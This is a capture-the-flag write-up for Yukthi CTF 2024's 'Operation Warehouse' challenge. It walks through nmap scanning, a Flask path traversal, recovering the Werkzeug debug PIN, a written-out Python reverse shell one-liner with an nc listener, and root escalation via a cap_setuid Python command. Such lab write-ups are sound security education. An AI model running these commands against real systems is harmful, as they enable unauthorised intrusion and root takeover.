Operation Warehouse: Yukthi CTF 2024 Prelims


Operation Warehouse is a web-based challenge in the Yukthi CTF 2024 prelims, featuring a multi-layered cyber puzzle set within a simulated underground network. Participants are plunged into a scenario where exploiting a Flask debug console vulnerability and a path traversal bug is just the beginning. Successful exploitation leads to acquiring the Werkzeug debugger pin, enabling a reverse shell through the Python console for initial machine access. The journey deepens on a second machine, where Python's setcap capabilities become the key to unlocking root access, challenging competitors to leverage their skills in real-world attack simulations effectively

Skills Learned

  • Reconnaissance and exploitation strategies
  • Privilege escalation and system security bypass
  • Network Reconnaissance & web pentestesting


1. Initial Reconnaissance

Conduct a port scan using nmap to identify active ports. The scan reveals that port 7777 is open, suggesting a web service might be running on that port.

   nmap -p- ipaddress

Port Scan

This scan shows that port 7777 is actively accepting connections, which is typically indicative of a web service.

2. Exploring Port 7777

Port forwarding to port 7777 revealed a website running on the server.

Flask server

Analyzing the webpage's source code led to the discovery of an interesting endpoint: `readfile?file=about.html`. Altering this endpoint to `readfile?file=....//...//` exposed a Flask error message, confirming the server's framework.

Flask Error Message
To confirm that Flask is running on the server, you can use Wappalyzer, a tool that detects technologies used on websites. This tool is helpful in quickly identifying backend technologies without needing to delve into source code errors or specific endpoints.

Flask Detected by Wappalyzer

Further attempts to access the `/console` endpoint succeeded, displaying the debug console pin on the production server.

The specific endpoints and debug features are exposed because the application is configured with DEBUG=True in its production settings. This configuration is generally used for development purposes to provide detailed error messages and access to interactive debug consoles, which should be disabled in a live production environment to prevent security vulnerabilities

Flask Debug Console

3. Exploiting Path Traversal

The `readfile` endpoint, which served files directly, was scrutinized next. The URL ` ` indicated susceptibility to a path traversal attack. The application's handling of path traversal was peculiar, as "../" sequences were replaced with an empty string initially, and subsequent "../" were converted to a dot.

Path Traversal Exploit

Using this knowledge, the following URL was crafted to exploit the vulnerability and attempt to read system files like `/etc/passwd`:

System File Access

To effectively exploit the Flask debugger's vulnerabilities, specific detailed information about the application environment is needed. Here’s a breakdown of the data required and how to use it to retrieve the console pin using a script designed for bypassing the Werkzeug debug console.

** Required Data for Console Pin Exploitation

To exploit the console pin, you need specific details about the Flask application environment, which are crucial for the script to generate the correct console pin. The necessary details include:

  • Username: The username under which the Flask application is running.
  • Modname: The name of the main module of the Flask application.
  • Machine ID: A unique identifier for the host machine which can sometimes be extracted from files like `/etc/machine-id`.
  • MAC Address: The MAC address of the network interface, often obtainable via system files or network configuration commands.

These details can typically be found by examining files within the application environment or by exploiting other vulnerabilities such as the path traversal flaw discovered.

For additional information and the script, check out the GitHub repository


Using this script correctly with the appropriate data will allow you to bypass the Werkzeug debug console's security and gain access, which can be crucial in a penetration testing scenario or a CTF challenge.


4. Obtaining Console Pin using automation script

The path traversal vulnerability was further exploited to obtain the console pin. A script was used to automate fetching the necessary data such as Flask app module names and machine identifiers:


This script, when executed, provides the debug console pin

Conole Pin

5. Exploiting the Debug Console

With the debug pin in hand, a reverse shell was targeted next. A listener was set up using `nc`:

nc -lnvp 9001

Executing the following Python script then allowed a reverse shell connection to be established:

import os;os.popen("""python3 -c 'import socket,subprocess,os,tty,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'""")

Reverse Shell

The reverse shell provided direct command line access to the server.

Shell Access

6. Victory

Using the obtained shell access, navigation to `/home/jamie` was accomplished to retrieve the first flag.

Second Challenge: Escalating Privileges

1. Identifying Python Capability

To escalate privileges, first, identify if any system binaries have special capabilities that can be exploited. This can be done using the `getcap` command, which lists all capabilities granted to executables.

  • Command:

    getcap -r / 2> /dev/null

    This command recursively searches the root directory for all files with any set capabilities, redirecting errors to null to clean up the output.

  • Finding: The command reveals that Python 3.8 has been granted special capabilities, making it a potential vector for privilege escalation.

Python Capability

2. Escalating Privileges Using Python

With Python 3.8 identified as having special capabilities, it can be used to execute commands as the root user. This is particularly useful if Python has the `cap_setuid` capability which allows changing the UID (User ID) of the process.

  • Exploitation Command:
python3.8 -c 'import os; os.setuid(0); os.system("/bin/sh")'

This command uses Python to change the current process's user ID to root (UID 0) and then spawns a shell with root privileges.

  • Execution:
    Run the above command in the terminal where Python's capabilities allow setting UID. If successful, this command grants a root shell, bypassing normal security restrictions.

Root Shell

3. Victory: Retrieving the Flag

Once root access is obtained, navigate to the root directory to search for sensitive files or the CTF challenge flag.

  • Retrieve the Flag:
    cd /root && cat secretfile

    This final step involves navigating to the root user's home directory and reading the contents of secretfile, where the flag for the second challenge is stored.

Leave a Comment

Realted Blog >>

DALL·E 2024-04-02 10.28.27 - A visually striking, colorful background that symbolizes unlocking or opening, featuring vibrant gradients and dynamic shapes
Case 118 Unlocked: A Blockchain OSINT Challenge Guide
Introduction Case 118 Unlocked is a blockchain-based OSINT challenge that tests your detective skills...
Pickle Portal - Yukthi CTF Prelims 2024 Write-up
Introduction The Pickle Portal Challenge offers an engaging test of Python and Linux skills through the...
DALL·E 2024-04-11 12.16.26 - Create an image with the title 'Mystery 013' placed in the very center, in bold and prominent lettering
Mastering the Mystery 013 - Yukthi CTF 2024 Prelims
Introduction "Mystery 013" is a digital forensics challenge in the Yukthi CTF 2024 prelims,...
1 2
Scroll to Top